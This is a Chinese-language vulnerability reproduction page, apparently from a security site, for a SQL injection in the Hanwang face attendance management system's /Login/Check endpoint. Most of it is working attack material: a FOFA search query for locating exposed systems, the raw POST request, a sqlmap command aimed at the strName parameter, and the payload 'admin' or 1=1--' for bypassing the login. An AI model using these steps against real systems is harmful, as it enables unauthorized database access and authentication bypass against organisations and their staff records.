menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 汉王人脸考勤管理系统 Check SQL注入漏洞 chevron_right 汉王人脸考勤管理系统 Check SQL注入漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    汉王人脸考勤管理系统 Check SQL注入漏洞.md
    1.23 KB / 2021-07-15 20:14:25
        # 汉王人脸考勤管理系统 Check SQL注入漏洞
    
    ## 漏洞描述
    
    汉王人脸考勤管理系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。
    
    ## 漏洞影响
    
    > 汉王人脸考勤管理系统
    
    ## FOFA
    
    > title=""汉王人脸考勤管理系统""
    
    ## 漏洞复现
    
    登录界面如下
    
    ![1621601228390](/resource/汉王人脸考勤管理系统/1621601228390.jpg)
    
    请求包如下
    
    ```shell
    POST /Login/Check HTTP/1.1
    Host: x.x.x.x
    Content-Length: 27
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://x.x.x.x:8088
    Referer: http://x.x.x.x:8088/Login/Index
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: ASP.NET_SessionId=otvxgfy0csmrw4i5y5t24oo1
    Connection: close
    
    strName=admin&strPwd=123456
    ```
    
    其中strName参数存在注入
    
    ```shell
    sqlmap -r postwang.txt -p strName  --current-user
    ```
    
    ![hw-2](/resource/汉王人脸考勤管理系统/hw-2.png)
    
    ```
    user: admin' or 1=1--
    pass: admin
    ```
    
    万能密码绕过登录
    
    ![1621601403462](/resource/汉王人脸考勤管理系统/1621601403462.jpg)
    
    links
    file_download